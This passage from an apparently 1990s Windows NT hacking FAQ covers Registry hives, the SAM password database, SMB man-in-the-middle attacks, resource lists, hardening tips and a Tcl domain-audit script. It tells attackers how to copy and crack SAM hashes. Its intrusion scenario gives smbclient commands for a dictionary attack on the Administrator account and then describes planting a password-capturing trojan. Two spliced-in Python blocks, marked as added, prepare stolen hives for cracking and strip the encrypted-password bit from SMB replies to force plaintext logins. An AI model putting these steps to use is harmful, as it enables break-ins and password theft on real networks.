The Registry contains thousands of individual items of data, grouped into "keys", each of which can hold subkeys and named values. Keys are grouped into subtrees, placing like keys together, and some are mirrored into a second subtree for more convenient access. The Registry is divided into four separate subtrees: HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, and HKEY_USERS. We'll go through them from most important to the hacker to least important to the hacker.

First and foremost is the HKEY_LOCAL_MACHINE subtree. It contains five different keys. These keys are as follows:

SAM and SECURITY - These keys contain info such as user rights, user and group info for the domain (or workgroup if there is no domain), and the password hashes. In the NT hacker game of capture the flag, this is the flag. Bag this and all bets are off.
The keys hold binary data only (for security reasons) and are typically not accessible unless you are an Administrator or in the Administrators group. It is easier to copy the data and play with it offline than to work on it directly. This is discussed in a little more detail in section 09-4.

HARDWARE - This is a storage database of throw-away data that describes the hardware components of the computer. Device drivers and applications build this database during boot and update it during runtime (although most of the database is updated during the boot process). When the computer is rebooted, the data is built again from scratch. It is not recommended to directly edit this particular database unless you can read hex easily. There are three subkeys under HARDWARE: the Description key, the DeviceMap key, and the ResourceMap key. The Description key describes each hardware resource, the DeviceMap key has data in it specific to individual groups of drivers, and the ResourceMap key tells which driver goes with which resource.

SYSTEM - This key contains basic operating stuff like what happens at startup, what device drivers are loaded, what services are in use, etc. These are split into ControlSets, each a complete system configuration (some bootable, some not), with each ControlSet containing the service data and OS components for that configuration. Ever had to boot from the "Last Known Good" configuration because something got hosed? That is a ControlSet stored here.

SOFTWARE - This key has info on software loaded locally. File associations, OLE info, and some miscellaneous configuration data are located here.

The second most important main key is HKEY_USERS. It contains a subkey, named by SID, for each user profile currently loaded on the machine, plus .DEFAULT, the profile in use at the logon screen. Domain users' account and password data is not stored here but in the SAM of a Domain Controller; their profile, however, is still loaded under HKEY_USERS while they are logged on at this machine, just like a local user's. Things such as Desktop settings and user profiles are stored here.
The third and fourth main keys, HKEY_CURRENT_USER and HKEY_CLASSES_ROOT, are views of portions of HKEY_USERS and HKEY_LOCAL_MACHINE respectively. HKEY_CURRENT_USER contains exactly what you would expect: the subkey from HKEY_USERS belonging to the currently logged in user. HKEY_CLASSES_ROOT is a view of a part of HKEY_LOCAL_MACHINE, specifically the SOFTWARE\Classes subkey: file associations, OLE configuration and dependency information.

---------------------------------------------------------------------------
09-2. What are hives?

Hives are the major subdivisions of all of these subtrees, keys, subkeys, and values that make up the Registry. Each hive holds "related" data and lives in its own file on disk. Look, I know what you might be thinking, but this is just how Microsoft divided things up -- I'm just relaying the info, even I don't know exactly what all the advantages to this setup are. ;-)

The system hives are stored in %systemroot%\SYSTEM32\CONFIG. The major hives and their files are as follows:

Hive                         File       Log File
---------------------------  ---------  ------------
HKEY_LOCAL_MACHINE\SOFTWARE  SOFTWARE   SOFTWARE.LOG
HKEY_LOCAL_MACHINE\SECURITY  SECURITY   SECURITY.LOG
HKEY_LOCAL_MACHINE\SYSTEM    SYSTEM     SYSTEM.LOG
HKEY_LOCAL_MACHINE\SAM       SAM        SAM.LOG
HKEY_CURRENT_USER            USERxxx    USERxxx.LOG
                             ADMINxxx   ADMINxxx.LOG
HKEY_USERS\.DEFAULT          DEFAULT    DEFAULT.LOG

The .LOG files are transaction logs rather than backups: a change is written to the log first and only then into the hive file, so after a crash the log can hold changes that never made it into the hive. The USERxxx/ADMINxxx layout is the NT 3.x one; on NT 4.0 each user's hive is the file NTUSER.DAT under %systemroot%\Profiles\<username>.

Hackers should look for the SAM file, with the SAM.LOG file as a secondary target. This contains the password info. Be aware that while NT is running the system holds the SAM hive open exclusively, so you cannot simply copy it; the usual ways around this are the backup copy RDISK leaves in %systemroot%\REPAIR (SAM._, which is compressed), booting something else and reading the NTFS partition with NTFSDOS, or dumping the hashes out of the running system with PWDUMP (both in section 10-5).

---------------------------------------------------------------------------
09-3. Why is the Registry like this and why do I care?

Who the hell knows why it's this way? ;-) The main reason is a step towards central administration and combining all that crap from SYSTEM.INI, WIN.INI, and other "legacy" Windows 3.x config stuff into one database. Then nice and neat individual GUI applications could be used to manipulate the data contained inside.
And with the idea of a "domain" there are some "centralized" functionalities that are a little more convenient.

Is it better than Windows 3.x? This is debatable, although in my personal opinion I'd say yes. Were the design goals met? Probably not. While the Registry tries to be all things to all subcomponents of a domain, it does tend to smell like there were too many cooks in Microsoft's kitchen and simply not enough spoons. Some functions seem to be well suited to the Registry, some not. It is certainly not "portable" like Novell's NDS, that is, you will probably never find the Registry running on a Unix system, whereas Novell's NDS is a much simpler design and is quite portable. Both schemes have their place -- NDS does not contain or manage OS info at the Desktop level and the Registry does.

Who wins? My guess is that the people currently offering training classes in any modern OS are loving this, because it is so complex that it guarantees income. And hackers also win, because this is a complex environment where one wrong parameter setting or one Hot Fix not loaded could mean free and easy access.

My main advice to hackers is to play around with the Registry before the attack, because as you go further and further into an NT environment you stand more chance of screwing things up, which is an easy way to make yourself known.

---------------------------------------------------------------------------
09-4. What do I do with a copy of SAM?

You get passwords. First use a copy of SAMDUMP.EXE to extract the user info out of it. You do not need to import this data into the Registry of your home machine to play with it. You can simply load it into one of the many applications for cracking passwords, such as L0phtCrack. See section 3 for more info on NT passwords and cracking them.
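Before feeding a copied hive to a cracker it is worth checking that what you grabbed is a complete, consistent hive file. As an added example (not code from the FAQ), here is a Python parser for the 4096-byte "regf" base block that every NT hive file starts with. It checks the magic, verifies the header checksum, and compares the two sequence numbers: if they differ, the hive was not flushed cleanly and the matching .LOG file holds changes not yet in the main file, which is exactly why SAM.LOG is the secondary target in 09-2. The sample hive header is constructed in the block; the path string and version numbers in it are assumptions for illustration, not bytes from a real SAM.

```python
"""Sanity-check a copied registry hive (SAM, SYSTEM, ...) before cracking it.

Added example, not from the FAQ.  Parses the fixed "regf" base block of an
NT hive file: magic, primary/secondary sequence numbers, root cell offset,
embedded file name and the header checksum.
"""
import struct

REGF_MAGIC = b"regf"
BASE_BLOCK_SIZE = 4096
CHECKSUM_OFFSET = 0x1FC        # last dword of the 512-byte header proper
HBIN_BASE = 0x1000             # cell offsets are relative to the first hbin


def regf_checksum(block):
    """XOR of the 127 little-endian dwords that precede the checksum field.
    Windows stores 1 for a result of 0 and 0xFFFFFFFE for 0xFFFFFFFF."""
    x = 0
    for (dword,) in struct.iter_unpack("<I", block[:CHECKSUM_OFFSET]):
        x ^= dword
    if x == 0:
        return 1
    if x == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return x


def parse_base_block(block):
    """Return the interesting header fields plus two consistency flags."""
    if len(block) < BASE_BLOCK_SIZE or block[:4] != REGF_MAGIC:
        raise ValueError("not a regf hive file")
    (seq1, seq2, _last_written, major, minor, _htype, _fmt,
     root_cell, bins_size) = struct.unpack_from("<IIQIIIIII", block, 4)
    # 64 bytes of UTF-16LE at offset 48: the hive's own idea of its path
    name = block[48:112].decode("utf-16-le").split("\x00", 1)[0]
    stored = struct.unpack_from("<I", block, CHECKSUM_OFFSET)[0]
    return {
        "sequence": (seq1, seq2),
        "clean": seq1 == seq2,            # False -> look at the .LOG too
        "version": (major, minor),
        "root_cell_offset": HBIN_BASE + root_cell,
        "hbins_size": bins_size,
        "name": name,
        "checksum_ok": stored == regf_checksum(block),
    }


def build_base_block(name, seq1=1, seq2=1, root_cell=0x20, bins_size=0x1000):
    """Construct a synthetic base block for demonstration (not a real SAM).
    Version 1.3 is assumed as the NT 4.0 hive format number."""
    block = bytearray(BASE_BLOCK_SIZE)
    block[:4] = REGF_MAGIC
    struct.pack_into("<IIQIIIIII", block, 4,
                     seq1, seq2, 0, 1, 3, 0, 1, root_cell, bins_size)
    encoded = name.encode("utf-16-le")[:64]
    block[48:48 + len(encoded)] = encoded
    struct.pack_into("<I", block, CHECKSUM_OFFSET, regf_checksum(block))
    return bytes(block)


def check_hive_file(path):
    """Convenience wrapper for a hive copied off a box."""
    with open(path, "rb") as fh:
        return parse_base_block(fh.read(BASE_BLOCK_SIZE))


if __name__ == "__main__":
    # Assumed path string; a real hive records whatever the kernel opened.
    sample = build_base_block("\\SystemRoot\\System32\\Config\\SAM")
    print(parse_base_block(sample))
    print(parse_base_block(build_base_block("dirty", seq1=9, seq2=8)))
```

A header that fails the checksum usually means a truncated or partially overwritten copy (a common result of grabbing the file while the system was writing it); a sequence mismatch means the copy is consistent but stale, and SAM.LOG contains the rest.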
---------------------------------------------------------------------------
Section 10 Resources
---------------------------------------------------------------------------

10-1. What are some NT WWW locations?

While there are dozens of WWW sites with information, here is a list of some that deal mainly with NT Security, or with some of the tools discussed in this FAQ.

WWW:

http://www.somarsoft.com/
http://www.ntsecurity.com/
http://listserv.ntbugtraq.com/
http://www.ntresearch.com/
http://www.ntinternals.com/
http://www.intrusion.com/
http://www.iss.net/
http://samba.anu.edu.au/pub/samba/samba.html
http://home.eunet.no/~pnordahl/ntpasswd/
http://www.dataprotect.com/ntfrag/

FTP:

ftp://ftp.netcom.com/pub/wo/woodardk

---------------------------------------------------------------------------
10-2. What are some NT USENET groups?

Tons o' newsgroups....

NT Security:

comp.os.ms-windows.nt.admin.security

Security in general:

comp.security.announce
comp.security.firewalls
comp.security.misc

NT in general:

comp.os.ms-windows.networking.misc
comp.os.ms-windows.networking.ras
comp.os.ms-windows.networking.tcp-ip
comp.os.ms-windows.networking.win95
comp.os.ms-windows.networking.windows
comp.os.ms-windows.nt.admin.misc
comp.os.ms-windows.nt.admin.networking
comp.os.ms-windows.nt.advocacy
comp.os.ms-windows.nt.announce
comp.os.ms-windows.nt.misc
comp.os.ms-windows.nt.pre-release
comp.os.ms-windows.nt.setup.hardware
comp.os.ms-windows.nt.setup.misc
comp.os.ms-windows.nt.software.backoffice
comp.os.ms-windows.nt.software.compatibility
comp.os.ms-windows.nt.software.services
comp.os.ms-windows.programmer.networks
comp.os.ms-windows.programmer.nt.kernel-mode

Web stuff where NT could be mentioned:

comp.infosystems.www.authoring.cgi
comp.infosystems.www.servers.misc
comp.infosystems.www.servers.ms-windows

Microsoft's newsgroups:

microsoft.public.windowsnt.40beta
microsoft.public.windowsnt.apps
microsoft.public.windowsnt.domain
microsoft.public.windowsnt.dsmnfpnw
microsoft.public.windowsnt.fsft
microsoft.public.windowsnt.mac
microsoft.public.windowsnt.mail
microsoft.public.windowsnt.misc
microsoft.public.windowsnt.print
microsoft.public.windowsnt.protocol.misc
microsoft.public.windowsnt.protocol.ras
microsoft.public.windowsnt.protocol.tcpip
microsoft.public.windowsnt.setup

---------------------------------------------------------------------------
10-3. What are some NT mailing lists?

The NT-security mailing list: To subscribe, send a message with SUBSCRIBE in the body to ntsecurity-request@iss.net.

NT-BugTraq: Like the BugTraq list, this is a full disclosure list. Send "subscribe ntbugtraq firstname lastname" (without the quotes) in the body of a message to listserv@ntbugtraq.com.

---------------------------------------------------------------------------
10-4. Where are some other NT Security FAQs?

The NT Security FAQ -- geared toward administrators:

http://www.it.kth.se/~rom/ntsec.html

---------------------------------------------------------------------------
10-5. Where can I get the files mentioned in this FAQ?
Archive           What Is It                     Where Is It
----------------  -----------------------------  -----------------------------------------------
c50a-nt-0.20.tgz  Crack 5.0 for NT               http://www.nmrc.org/files/snt/
cifs.txt          Hobbit's NetBios Paper         http://199.103.168.8:2001/web1/hak/cifs.txt
lc15src.tar.gz    L0phtcrack 1.5 for Unix        all three from either
lc15exe.zip       L0phtcrack 1.5 for DOS/NT        ftp://dot.ishboo.com/l0pht/ or
lc15src.zip       L0phtcrack 1.5 DOS/NT source     http://www.nmrc.org/files/snt/
windowsnt.tgz     Netbios Auditing Tool 1.0      ftp://ftp.secnet.com/pub/tools/
ncnt090.zip       Netcat for NT                  http://www.nmrc.org/files/nt/
netmonex.tgz      NetMon Exploit                 http://www.nmrc.org/files/nt/
NTCrack.tar.gz    NT Crack 2.0                   http://www.nmrc.org/files/snt/
ntfsdos.zip       NTFS Access                    http://www.nmrc.org/files/nt/
passwd.zip        Passwd                         http://wwwthep.physik.uni-mainz.de/~frink
pwdump.exe        Password Dump                  http://www.nmrc.org/files/snt/
samba-*           Samba                          ftp://samba.anu.edu.au/pub/samba/
smbfs-2.0.1.tgz   smbmount                       sunsite.unc.edu/pub/Linux/filesystems/smbfs
tpu.zip           Therion's Password Utility     http://www.nmrc.org/files/msdos/

---------------------------------------------------------------------------
10-6. Where can I find Service Packs and Hot Fixes?

The main location for Service Packs is

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz

where xxx is the country, yyy is the NT version, and zzz is the Service Pack. For example, this is the address for the USA version of Service Pack 3 for NT 4:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/ussp3

The main location for Hot Fixes is

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/xxx/yyy/zzz

where xxx is the country, yyy is the NT version, and zzz is the Hot Fix directory.
For example, this is the address for the USA versions of Hot Fixes for NT 4 if Service Pack 3 is already installed:

ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/nt40/hotfixes-postSP3

---------------------------------------------------------------------------
Section 11 Mathematical/Theoretical
---------------------------------------------------------------------------

11-1. Can sessions be hijacked?

In theory, however no one has yet coded the exploit. It would involve a complex spoofing job where not only would the session have to be hijacked at the transport level (getting all of the TCP sequence and acknowledgement numbers right), but the tree ID (TID) and user ID (UID) would have to be spoofed at the redirector and server level respectively. We are talking SMB at this point. A more likely session to be hijacked would be a telnet session to an NT server, but this applies to any straight telnet session, NT or not, and is beyond the scope of this FAQ. For more information refer to http://www.nmrc.org/files/unix/ip-exploit.txt.

---------------------------------------------------------------------------
11-2. Are "man in the middle" attacks possible?

Early versions of LANMAN send the password in the clear, which is definitely sniffer bait. But even the challenge/response authentication used by LANMAN 2.1 and earlier is open to attack, namely a known-plaintext attack. Since the challenge goes over the wire in the clear, an attacker who sniffs the exchange acquires a known plaintext (the challenge) together with its ciphertext (the response). Offline, the attacker can then test a guess at a password by using it to generate the key, encrypting the challenge, and comparing the result with the sniffed response. If it matches, the password is compromised. Since case doesn't matter in the LANMAN scheme (the password is upper-cased before it is hashed), the keyspace is small enough that a brute force attack against a plaintext/ciphertext pair obtained this way is quite feasible. However, this is still an offline attack.
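Two pieces of 11-2 are worth seeing as bytes: the offline known-plaintext check just described, and the downgrade step in the attack sequence that follows, where the attacker alters the server's SMB_COM_NEGPROT reply so the client sends its password in the clear. The Python below is an added example, not code from the FAQ or from c2myazz. It builds a constructed NT LM 0.12 negotiate response, clears the "encrypt passwords" bit of its SecurityMode byte, and models a client that refuses the downgrade. For the offline check, HMAC-MD5 stands in for the real LM/NT response function (DES of the challenge under keys derived from the LM or NT hash), because the Python standard library has no DES; the dictionary loop and the compare are the point, not the stand-in cipher. The domain name NMRC and the challenge bytes are made up.

```python
"""SMB_COM_NEGPROT response parsing, the plaintext downgrade, and the offline
challenge/response check from 11-2.  Added example, not from the FAQ.
"""
import hashlib
import hmac
import struct

SMB_COM_NEGOTIATE = 0x72
FLAGS_REPLY = 0x80
SEC_USER_LEVEL = 0x01          # user-level (not share-level) security
SEC_ENCRYPT_PASSWORDS = 0x02   # server supports challenge/response
SMB_HEADER = "<4sB4sBHH8sHHHHH"      # 32 bytes
NEGPROT_WORDS = "<HBHHIIIIqhB"       # 17 words = 34 bytes for NT LM 0.12
SECMODE_OFFSET = 32 + 1 + 2          # header, WordCount, DialectIndex


def build_negprot_response(challenge, domain=b"NMRC",
                           security_mode=SEC_USER_LEVEL | SEC_ENCRYPT_PASSWORDS):
    """Constructed server reply to a negotiate that picked NT LM 0.12."""
    hdr = struct.pack(SMB_HEADER, b"\xffSMB", SMB_COM_NEGOTIATE, b"\0\0\0\0",
                      FLAGS_REPLY, 0x0001, 0, b"\0" * 8, 0, 0, 0, 0, 0)
    words = struct.pack(NEGPROT_WORDS, 0, security_mode, 50, 1, 4356, 65536,
                        0, 0x0001, 0, 0, len(challenge))
    data = challenge + domain + b"\0"
    return hdr + bytes([17]) + words + struct.pack("<H", len(data)) + data


def parse_negprot_response(pkt):
    fields = struct.unpack_from(SMB_HEADER, pkt, 0)
    if (fields[0] != b"\xffSMB" or fields[1] != SMB_COM_NEGOTIATE
            or not fields[3] & FLAGS_REPLY):
        raise ValueError("not a negotiate response")
    if pkt[32] != 17:
        raise ValueError("not an NT LM 0.12 style response")
    (dialect, secmode, _mpx, _vcs, _maxbuf, _maxraw, _skey, _caps,
     _time, _tz, keylen) = struct.unpack_from(NEGPROT_WORDS, pkt, 33)
    bytecount = struct.unpack_from("<H", pkt, 67)[0]
    data = pkt[69:69 + bytecount]
    return {"dialect_index": dialect,
            "user_level": bool(secmode & SEC_USER_LEVEL),
            "encrypt_passwords": bool(secmode & SEC_ENCRYPT_PASSWORDS),
            "challenge": data[:keylen],
            "domain": data[keylen:].split(b"\0")[0]}


def downgrade_to_plaintext(pkt):
    """The attacker's edit from 11-2: clear the challenge/response bit and
    relay the reply, so an old redirector sends the password in the clear."""
    out = bytearray(pkt)
    out[SECMODE_OFFSET] &= ~SEC_ENCRYPT_PASSWORDS & 0xFF
    return bytes(out)


def client_accepts(pkt, allow_plaintext):
    """Model of the redirector's decision.  allow_plaintext=False is the
    hardened behaviour (what NT 4 SP3 does unless EnablePlainTextPassword
    is turned on): refuse a server that offers no challenge."""
    return parse_negprot_response(pkt)["encrypt_passwords"] or allow_plaintext


def response_for(password, challenge):
    """Stand-in for the LM response function: keyed by the upper-cased
    password the way LANMAN is.  Real LM/NT uses DES under hash-derived keys."""
    return hmac.new(password.upper().encode(), challenge, hashlib.md5).digest()


def crack_pair(challenge, response, wordlist):
    """Offline known-plaintext check: which guess reproduces the response?"""
    for guess in wordlist:
        if hmac.compare_digest(response_for(guess, challenge), response):
            return guess
    return None


if __name__ == "__main__":
    ch = bytes.fromhex("0123456789abcdef")     # constructed 8-byte challenge
    good = build_negprot_response(ch)
    bad = downgrade_to_plaintext(good)
    print(parse_negprot_response(good))
    print(parse_negprot_response(bad))
    print("old client accepts downgrade:", client_accepts(bad, True))
    print("SP3 client accepts downgrade:", client_accepts(bad, False))
    print("cracked:", crack_pair(ch, response_for("secret", ch),
                                 ["password", "admin", "SECRET"]))
```

Note that the packet length does not change and the challenge is still carried in the data block; only one bit in SecurityMode decides whether the client hashes or sends the password, which is why a client-side refusal to ever send plaintext is the fix rather than anything the server can do.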
A true man-in-the-middle attack allows a third party to intercept and replace components of the challenge/response conversation with their own, acquiring the password or even taking over the session itself. However, the easier of the two is getting the password. By catching the start of a conversation and forging the challenge, the attacker gets the client's response to a challenge the attacker chose, so the attacker knows both sides of the equation, shortening the time and effort needed to break the plaintext/ciphertext pair. By "precompiling" a list of response/password pairs for that fixed challenge, the password can be determined even quicker.

NT LM 0.12 (the NT dialect) uses MD4 over the Unicode password to generate the keying material, and since upper and lower case are distinguished, the full 56 bits of each DES key can be used. This does not eliminate the problem -- it simply increases the difficulty of brute force against a plaintext/ciphertext pair. And it does nothing against a realtime attack. The best method would be as follows:

- Client starts a session by sending SMB_COM_NEGPROT.
- Attacker sees this session, and waits for the response from the server.
- Server sends the response and the Attacker grabs it.
- Attacker clears the "encrypted passwords" bit in the security mode field of the SMB_COM_NEGPROT reply and sends the altered reply to the Client.
- Client receives the Attacker's packet, and now assumes a plaintext password should be used.
- Client receives the real packet from the server, but ignores it thinking it is a dupe.
- Client sends the password in plaintext.
- Attacker grabs the password and now logs into the Server directly.
- Client times out or gets an error, and figures a network error has occurred. Client tries to log in again.

It is also possible in theory to catch the session before the authentication process even starts. For example:

- Client starts a session, and sends a request to the DNS server to resolve a host name.
- Attacker sees this request, and forges a reply saying that the Attacker's IP address is the address for the host the Client is requesting.
- The Attacker's forged reply reaches the Client before the real one. (There is no way to cancel a DNS query; the Client simply accepts the first answer carrying the right transaction ID and discards the genuine one that arrives later.)
- Client starts to log into the Attacker.
- Attacker tells the Client to send the password as plaintext.
- Client complies, and the Attacker proceeds to log into the original host that the Client was asking the DNS server about.
- Attacker kills the session with the Client, and the Client thinks an error has occurred and tries again.

This attack has been partially implemented in c2myazz, which forces a plaintext login. NT 4.0 SP3 closed the client side of this: the redirector no longer sends clear-text passwords unless an administrator deliberately re-enables it with the EnablePlainTextPassword registry value.

---------------------------------------------------------------------------
11-3. What about TCP Sequence Number Prediction?

Refer to section 11-1. This is possible, but unlikely, on anything requiring the TID and UID as part of the spoof. TCP Sequence Number Prediction involves guessing what the TCP sequence number will be and inserting packets carrying the proper sequence number to (typically) execute commands on the target host.

---------------------------------------------------------------------------
Section 12 For Administrators Only
---------------------------------------------------------------------------

12-1. How do I secure my server?

- Upgrade to NT 4.0 and install the latest service pack.
- Physically secure all servers.
- Disable remote logins to workstations.
- No dual booting. NT only on the hard drives, and format NTFS only.
- Remove the group Everyone from being able to read so much of the registry.
- Use Auditing. Heavily if Internet connected.
- Make sure program file directories have just Read and Execute permissions. Try to separate public files from private files.
- Note the owners of directories. The owner can still change things inside a directory, despite permissions being reset.
- Go into User Manager and create a restrictive password policy.
- Disable the Last Logon username display.
- Add the Domain Admins global group to the local Administrators group on each workstation so the domain admins keep control of them.
- Restrict access to certain executables you deem dangerous (possibly CMD.EXE or NTBACKUP.EXE if you are real paranoid).
- Re-read this FAQ and note every time you see "this attack won't work if the Sys Admin did..." and actually do it.
- Use a firewall. As a minimum, do not allow outside access to ports 135 through 139 for both TCP and UDP.
- Put web, ftp, and any other public servers OUTSIDE the firewall, or in a DMZ between a couple of firewalls.
- Come to think of it, read a book on firewalls.
- Consider using "internal" firewalls if you need to secure certain servers from certain groups of users, i.e. protect the accounting server from the disgruntled marketing group.
- Read your logs. Daily. Use them as a guide, however don't blindly trust that every action is in the logs, or that every action reflected in the logs is to be taken at face value. INVESTIGATE ODD THINGS.
- Run C2Config after you have adjusted the INF file to meet your needs.
- Regularly run virus scans, non-Microsoft-written security scanners, and your C2Config utility (if you initially used it).
- Subscribe to the mailing lists and read the newsgroups listed in section 10. Daily. Read the NT Security FAQ. Repeatedly. Read all the pages at the www sites listed in section 10. Frequently.
- Read Hobbit's paper on CIFS. If it's too technical, hire a new Sys Admin.
- Don't panic, but be paranoid all the time. Take every security concern or oddball alert seriously.

---------------------------------------------------------------------------
12-2. I'm an idiot. Exactly how do hackers get in?

I mentioned the World Star Holdings Inc. Cybertest '96 contest earlier in the FAQ. I wish I could say that this contest involved some type of massive attack rich in color and unbelievable hacking genius, but alas, it was too easy. Using techniques outlined in this FAQ, I simply got a list of exported shares and logged in as GUEST.
I enjoyed trying to get past the special HTML scripting language they were using, and only did it because I wanted the $50,000.00 prize money. But I wasn't the first one in, and they changed the rules mid-contest anyway.

Here's a scenario that pulls some of this together.

The Exploit
-----------

The attacker has a copy of Samba on his Linux machine, and has applied the patches from Hobbit's paper making smbclient a little more dangerous. He starts looking at his target innocent.nmrc.org. Using a port scanner he determines that ports 135-139 are open, and suspects the box might be NT. The target IP address is 10.10.10.2. So he tries his hacked version of nmblookup like so -

nmblookup -B 10.10.10.2 -S \*

The name INNOCENT is returned, and this is plugged into the hacked smbclient like so -

smbclient \\\\INNOCENT\\WINNT$ -I 10.10.10.2 -d 3 -n WHATEVER -m \
LANMAN2 -U ADMINISTRATOR

Note that the hacker is trying to access the C drive, is using debug level 3 to see errors (and see how long before an error occurs), has forged his computer's name, and has dumbed the dialect down to LANMAN2 so that only Lan Manager style (uppercase) passwords are tried. Several simple passwords are tried, and it looks like Administrator has not been set up to lock out after incorrect tries. However, the usual easy passwords do not work. The hacker is not frustrated. He decides to throw his uppercase dictionary at it -

smbclient \\\\INNOCENT\\WINNT$ -I 10.10.10.2 -d 0 -n WHATEVER -m \
LANMAN2 -U ADMINISTRATOR < dictionary.file.uppercase

The hacked smbclient will continue until the dictionary file is exhausted, the hacker stops the program, or he gets in. After a while, success. The hacker uploads a trojan to \SYSTEM32 to capture passwords. Then the hacker goes to \SYSTEM32\CONFIG\SAM and \REPAIR and finds copies of the SAM database. These are copied down to his home machine. The hacker disconnects and proceeds to use PWDump and L0phtcrack to get ALL passwords.
The hacker knows that some of the passwords might be old -- after all, he couldn't grab the live SAM database. But between the old passwords and the trojan, the hacker isn't even worried if the Administrator changes passwords. The hacker will simply use another account name and check the \TEMP directory for the collected passwords.

---------------------------------------------------------------------------
---------------------------------------------------------------------------
Appendix Section A-01. Source Code for an Audit Script
---------------------------------------------------------------------------

This source was originally posted to ISS' NT Security mailing list, and I've lost the original author of the code. It is a Tcl script that relies on Christopher Sedore's NT extensions (ntsys.dll) for the NT_* calls. Anyway, here it is reproduced without permission, but then again it's probably in a mailing list archive somewhere anyway... ;-)

# Audit accounts, privileges, servers, workstations, and trust relationships
# of a domain. The domain name can be specified as an argument, or else the
# current domain will be used

# load extensions
# load Christopher Sedore's NT extensions (the system portion)
load ntsys.dll

# Procedure forward definitions

# check if account is enabled - returns the string "ENABLED" or "DISABLED"
# there is a special case if accountinfolist is set to 0. the string "GROUP"
# is returned in this case.
proc checkAccountStatus {accountinfolist} {
    if {$accountinfolist == 0} then {set enablestatus "GROUP   "; return $enablestatus;}
    # the UF_ACCOUNTDISABLE flag in the user info list means a disabled account
    if {[lsearch -glob $accountinfolist {*UF_ACCOUNTDISABLE*}] < 0} \
        then {set enablestatus "ENABLED"} \
        else {set enablestatus "DISABLED"};
    return $enablestatus;
}

# print list. If list length is 0, then "NONE" is printed.
proc printList {list printdest} {
    set listindex 0;
    if {[llength $list] == 0} then {puts $printdest "NONE"; return;};
    while {$listindex < [llength $list]} {
        puts $printdest "[lindex $list $listindex]";
        incr listindex;
    }
}

# print list with account status check
# NT_UserGetInfo is called first with the account name given in list, if that fails
# then it might be a local account so the machine name and "\" are stripped off the
# front and NT_UserGetInfo is called again. If that fails then we set accountinfolist
# to 0.
proc printListWithAccountStatus {list printdest server} {
    upvar pdc p_pdc;
    set listindex 0;
    if {[llength $list] == 0} then {puts $printdest "NONE"; return;};
    while {$listindex < [llength $list]} {
        if {[catch {set accountinfolist [NT_UserGetInfo $server [lindex $list $listindex]]}] != 0} \
            then {
                set cleanname [string trimleft [lindex $list $listindex] [string trimleft $server "\\"]];
                if {[catch {set accountinfolist [NT_UserGetInfo $server [string trimleft $cleanname "\\"]]}] != 0} \
                    then {set accountinfolist 0}
            };
        puts $printdest "[lindex $list $listindex] : [checkAccountStatus $accountinfolist]";
        incr listindex;
    }
}

# clean up machine account list: flatten the NT_UserEnum result, then take
# every third element, prefix it with backslashes and drop the trailing "$"
proc cleanMachineAccountList {machinelist} {
    set listindex 0;
    set templist {};
    while {$listindex < [llength $machinelist]} {
        set templist [concat $templist [lindex $machinelist $listindex]];
        incr listindex;
    }
    set listindex 0;
    set list {};
    while {$listindex < [llength $templist]} {
        set list [concat $list [string trimright [format "\\\\\\\\%s" [lindex $templist $listindex]] {$}]];
        incr listindex 3;
    }
    return $list;
}

# MAIN CODE

# check command line args: first argument is the log file, second the domain,
# or else an empty string (to represent the current domain)
if {$argc > 0} then {set logfile [lindex $argv 0]} else {set logfile {c:\AuditLog.txt}}
if {$argc == 2} then {set domain [lindex $argv 1]} else {set domain {}}

# open audit log file
set auditlog [open $logfile a+]

# find Primary Domain Controller
set pdc [NT_GetDCName $domain]

# print tag for DOMAIN STATISTICS section
puts $auditlog "\[DOMAIN STATISTICS\]\n"

# get DCs and clean up list for printing
set dclist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_SERVER_TRUST_ACCOUNT}]]
# print them out
puts $auditlog "Domain Controllers:\n"
printList $dclist $auditlog

# print PDC name
puts $auditlog "\nPrimary Domain Controller:\n\n$pdc\n"

# get domain user accounts
set userlist [NT_UserEnum $pdc {}]
# print user list
puts $auditlog "\nDomain Users:\n"
printList $userlist $auditlog

# get groups defined in the domain
set grouplist [NT_GroupEnum $pdc]
# print group list
puts $auditlog "\nGroups defined in the domain:\n"
printList $grouplist $auditlog

# print users in each group and the account status
set listindex 0
while {$listindex < [llength $grouplist]} {
    set templist [NT_GroupGetUsers $pdc [lindex $grouplist $listindex]];
    puts $auditlog "\nUsers in the \"[lindex $grouplist $listindex]\" group:\n";
    printListWithAccountStatus $templist $auditlog $pdc;
    incr listindex;
}

# get machine accounts in domain for workstations and non-DC servers
set wrkstalist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_WORKSTATION_TRUST_ACCOUNT}]]
# print them out
puts $auditlog "\nWorkstations and non-DC servers in the domain:\n"
printList $wrkstalist $auditlog

# get trust relationships
set trustlist [cleanMachineAccountList [NT_UserEnum $pdc {FILTER_INTERDOMAIN_TRUST_ACCOUNT}]]
# print them out
puts $auditlog "\nDomains with which trust relationships are configured:\n"
printList $trustlist $auditlog

# move on to machine statistics
puts $auditlog "\n\[MACHINE STATISTICS\]\n"

# do domain controllers
# put in error handling for RPC server unavailable for NT_LocalGroupEnum
set listindex 0
while {$listindex < [llength $dclist]} {
    if {[catch {NT_LocalGroupEnum [lindex $dclist $listindex]} machinegrouplist]} \
        then {puts $auditlog "\n[lindex $dclist $listindex] unavailable"; incr listindex; continue;};
    puts $auditlog "\n[lindex $dclist $listindex] groups:\n";
    printList $machinegrouplist $auditlog;
    set tempindex 0;
    while {$tempindex < [llength $machinegrouplist]} {
        set templist [NT_LocalGroupGetUsers [lindex $dclist $listindex] [lindex $machinegrouplist $tempindex]];
        puts $auditlog "\nUsers in the \"[lindex $machinegrouplist $tempindex]\" group:\n";
        printListWithAccountStatus $templist $auditlog [lindex $dclist $listindex];
        incr tempindex;
    }
    incr listindex;
}

# do workstations and non-DC servers
set listindex 0
while {$listindex < [llength $wrkstalist]} {
    if {[catch {NT_LocalGroupEnum [lindex $wrkstalist $listindex]} machinegrouplist]} \
        then {puts $auditlog "\n[lindex $wrkstalist $listindex] unavailable"; incr listindex; continue;};
    puts $auditlog "\n[lindex $wrkstalist $listindex] groups:\n";
    printList $machinegrouplist $auditlog;
    set tempindex 0;
    while {$tempindex < [llength $machinegrouplist]} {
